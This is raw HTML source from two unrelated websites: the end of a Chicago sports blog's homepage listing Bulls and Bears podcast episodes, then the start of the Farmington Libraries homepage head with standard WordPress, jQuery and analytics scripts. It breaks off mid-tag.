srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="48172" data-permalink="https://theloopsports.com/2019/04/24/the-loop-on-hoops-bulls-podcast-ep-1-intro-draft-talk-and-much-more/the-loop-on-hoops-logo/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=1926%2C1414&amp;ssl=1" data-orig-size="1926,1414" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="The Loop on Hoops Logo" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=300%2C220&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=950%2C698&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> <a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/" rel="category tag">TLS Podcasts</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/24/the-loop-on-hoops-bulls-podcast-ep-1-intro-draft-talk-and-much-more/" rel="bookmark">The Loop On Hoops Bulls Podcast: Ep. 1 – Intro, Draft Talk and Much More</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Dan and Nick are here with The Loop On Hoops – A Chicago Bulls podcast putting the fun back in Bulls basketball (suck it Gar/Pax).They try to make Bulls basketball fun again by talking about the 2019 draft</p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48169" class="post-48169 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears category-tlspodcasts tag-chicago-bears"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/04/24/monsters-of-the-microphone-podcast-what-is-the-rest-of-the-nfc-north-going-to-do-in-the-2019-nfl-draft/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="41410" data-permalink="https://theloopsports.com/received_315024099254961/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Monsters of the Microphone" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=950%2C950&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> <a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/" rel="category tag">TLS Podcasts</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/24/monsters-of-the-microphone-podcast-what-is-the-rest-of-the-nfc-north-going-to-do-in-the-2019-nfl-draft/" rel="bookmark">Monsters of the Microphone: Podcast: What is the Rest of the NFC North Going to Do in the 2019 NFL Draft?</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>The guys discussed the Packers, Lions, and Vikings and what they will/should do in the 2019 NFL Draft. </p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48062" class="post-48062 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears category-tlspodcasts tag-chicago-bears tag-tls-podcast"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/04/22/monsters-of-the-microphone-bears-podcast-nfl-draft-2019-defensive-prospects/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="41410" data-permalink="https://theloopsports.com/received_315024099254961/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Monsters of the Microphone" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/09/received_315024099254961.jpeg?fit=950%2C950&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> <a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/" rel="category tag">TLS Podcasts</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/22/monsters-of-the-microphone-bears-podcast-nfl-draft-2019-defensive-prospects/" rel="bookmark">Monsters of the Microphone Bears Podcast: NFL Draft 2019 – Defensive Prospects</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>In this episode of The Monsters of the Microphone podcast, the guys talk about the top defensive prospects for the 2019 NFL Draft.</p> </div><!-- end .entry-summary --> </article><!-- #post-## --> <article id="post-48095" class="post-48095 post type-post status-publish format-standard has-post-thumbnail hentry category-typical-chicago-fans tag-tls-podcast"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/04/22/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-morale-check-with-dom-frederic-tim-anderson-bat-flip-nba-nhl-talk-and-much-more/"><img width="800" height="450" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="41572" data-permalink="https://theloopsports.com/2018/09/13/typical-chicago-fan-a-casual-fans-take-at-the-loop-sports/newtcf_edited/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Typical Chicago Fans TCF Podcast" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=950%2C950&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/podcastsandvideo/typical-chicago-fans/" rel="category tag">Typical Chicago Fans</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/22/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-morale-check-with-dom-frederic-tim-anderson-bat-flip-nba-nhl-talk-and-much-more/" rel="bookmark">LISTEN &#8211; Typical Chicago Fans Podcast 🔊: Morale Check With DOM Frederic, Tim Anderson bat flip, NBA &amp; NHL Talk and MUCH more!</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Welcome to Ep. 31 of Typical Chicago Fans presented by The Loop Sports, April 22, 2019. Big Z and Boomy<a class="more-link" href="https://theloopsports.com/2019/04/22/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-morale-check-with-dom-frederic-tim-anderson-bat-flip-nba-nhl-talk-and-much-more/">Continue Reading</a></p> </div><!-- end .entry-summary --> </article><!-- #post-## --> </div><!-- end .section-fourcolumn-postwrap --> </section><!-- end #front-section-fourcolumn --> <footer id="colophon" class="site-footer cf"> <div class="footer-wrap"> <nav class="jetpack-social-navigation jetpack-social-navigation-genericons" role="navigation" aria-label="Social Links Menu"> <div class="menu-social-media-container"><ul id="menu-social-media-4" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheLoopSports"><span class="screen-reader-text">Facebook</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheLoop_Sports"><span class="screen-reader-text">Twitter</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18"><a href="https://www.instagram.com/theloopsports/"><span class="screen-reader-text">Instagram</span></a></li> </ul></div> </nav><!-- .jetpack-social-navigation --> <div id="site-info" class="cf"> <a></a> </div><!-- end #site-info --> </div><!-- end .footer-wrap --> </footer><!-- end #colophon --> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22primary%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Ftheloopsports.com%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22click%22%2C%22wrapper%22%3Atrue%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3A%22blog-wrap%22%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Older%20posts%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2214.05.19%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A1%2C%22history%22%3A%7B%22host%22%3A%22theloopsports.com%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22static%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B48606%2C48600%2C48545%2C48559%2C48563%2C48554%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A10%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2250%22%2C%22no_found_rows%22%3Afalse%2C%22order%22%3A%22DESC%22%7D%2C%22query_before%22%3A%222019-05-16%2008%3A44%3A47%22%2C%22last_post_date%22%3A%222019-05-07%2022%3A31%3A20%22%2C%22body_class%22%3A%22infinite-scroll%22%2C%22stats%22%3A%22blog%3D121115887%26host%3Dtheloopsports.com%26v%3Dext%26j%3D1%3A7.3.1%26x_pagetype%3Dinfinite-click-jetpack%22%7D%7D' ) ); //]]> </script> <!-- --> <!-- Jetpack Google Analytics --> <script type='text/javascript'> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-117967138-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' === document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <div style="display:none"> </div> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/infinite-scroll/infinity.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/theloopsports.com\/wp-admin\/admin-ajax.php","nonce":"1daedbecbc","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/theloopsports.com\/wp-login.php?redirect_to=https%3A%2F%2Ftheloopsports.com%2F2019%2F05%2F14%2Fbulls-draw-number-seven-at-draft-lottery%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/carousel/jetpack-carousel.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/wp-mediaelement.min.js'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/modules/wpgroho.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var screenReaderText = {"expand":"<span class=\"screen-reader-text\">expand child menu<\/span>","collapse":"<span class=\"screen-reader-text\">collapse child menu<\/span>"}; /* ]]> */ </script> <script type='text/javascript' src='https://theloopsports.com/wp-content/themes/nikau/js/functions.js?ver=20160507'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/twitter-timeline.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/likes/queuehandler.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var icegram_pre_data = {"ajax_url":"https:\/\/theloopsports.com\/wp-admin\/admin-ajax.php","post_obj":{"is_home":true,"page_id":48595,"action":"display_messages","shortcodes":[],"cache_compatibility":"no","device":"laptop"}}; /* ]]> */ </script> <script type='text/javascript' src='https://theloopsports.com/wp-content/plugins/icegram/assets/js/main.min.js?ver=1.10.26'></script> <script type="text/javascript"> jQuery.extend( infiniteScroll.settings.scripts, ["jquery-core","jquery-migrate","jquery","spin","jquery.spin","tiled-gallery","mediaelement-core","mediaelement-migrate","mediaelement","slick","viewportchecker","sticky-kit","postmessage","jetpack_resize","the-neverending-homepage","jetpack-photon","devicepx","jetpack-carousel","wp-mediaelement","grofiles-cards","wpgroho","nikau-script","jetpack-twitter-timeline","jetpack_likes_queuehandler","wp-embed","icegram_main_js"] ); jQuery.extend( infiniteScroll.settings.styles, ["the-neverending-homepage","wp-block-library","jetpack_likes","jetpack-carousel","tiled-gallery","mediaelement","wp-mediaelement","nikau-fonts","nikau-style","genericons","slick-style","jetpack-social-menu","wordads","jetpack_css"] ); </script><script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'121115887',post:'0',tz:'-5',srv:'theloopsports.com'} ]); _stq.push([ 'clickTrackerInit', '121115887', '0' ]); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <link href='http://fonts.googleapis.com/css?family=Arimo' rel='stylesheet' type='text/css'> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <meta charset="UTF-8" /> <title> The Farmington Libraries | Service. Experiences. Resources. </title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://farmingtonlibraries.org/xmlrpc.php" /> <link rel="stylesheet" type="text/css" media="all" href="http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/style.css" /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Farmington Libraries &raquo; Feed" href="http://farmingtonlibraries.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Farmington Libraries &raquo; Comments Feed" href="http://farmingtonlibraries.org/comments/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.5.1 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.5.1'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-3242535-3'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-3242535-3', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'linkid', 'linkid.js'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/farmingtonlibraries.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='coloroptions-css' href='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/color/blue.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='shortcodes-css' href='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/css/shortcode.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='http://farmingtonlibraries.org/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wpcdt-public-css-css' href='http://farmingtonlibraries.org/wp-content/plugins/countdown-timer-ultimate/assets/css/wpcdt-timecircles.css?ver=1.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='colorbox-css' href='http://farmingtonlibraries.org/wp-content/plugins/slideshow-gallery/views/default/css/colorbox.css?ver=1.3.19' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesome-css' href='http://farmingtonlibraries.org/wp-content/plugins/slideshow-gallery/views/default/css/fontawesome.css?ver=4.4.0' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"http:\/\/farmingtonlibraries.org","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.5.1'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/js/ddsmoothmenu.js?ver=5.1.1'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/js/jquery.flexslider.js?ver=5.1.1'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/js/jquery.prettyPhoto.js?ver=5.1.1'></script> <script type='text/javascript' 